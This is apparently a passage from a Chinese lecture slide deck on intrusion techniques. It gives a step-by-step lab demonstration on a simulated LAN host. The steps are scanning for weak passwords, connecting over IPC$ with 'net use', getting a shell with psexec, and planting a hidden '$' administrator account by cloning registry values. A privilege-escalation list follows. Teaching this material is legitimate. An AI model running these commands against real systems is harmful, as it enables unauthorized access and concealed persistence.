入侵技术原理.pptVIP

实例3:建立超级隐身帐户 1.用x-scan等端口扫描工具,扫描远程主机(比如局域网模拟机ip54)的漏洞. 2.利用扫描出的漏洞(比如帐户信息用户名:administrator 密码为弱口令)与远程主机建立非空连接: Net use \\54\ipc$ “”/user:”administrator” 3.利用pstools黑客工具登陆,先把pstools复制到某个盘,比如c:\ 在开一个cmd 转到c:\pstools 输入 psexec \\54 cmd 得到对方一个cmd shell 4.建立超级隐身帐户: (1)打开注册表编辑器:开始-运行 cmd regedt32,并且把administrators组提升为完全权限. (2)新建一个带$的帐号(如crz$) net user crz$ 123 /add (123是密码) (3) 打开注册表regedit,把帐户crz$克隆成管理员权限 ,复制F值 (4)导出提权后的帐户的注册表文件的两个键值 (name 和user) (5)删除帐户crz$ net user crz$ /del (6)导入注册表文件键值 (name 和user)到远程主机 演示. 权限提升 1.net localgroup 提权2.注册表提权3外部工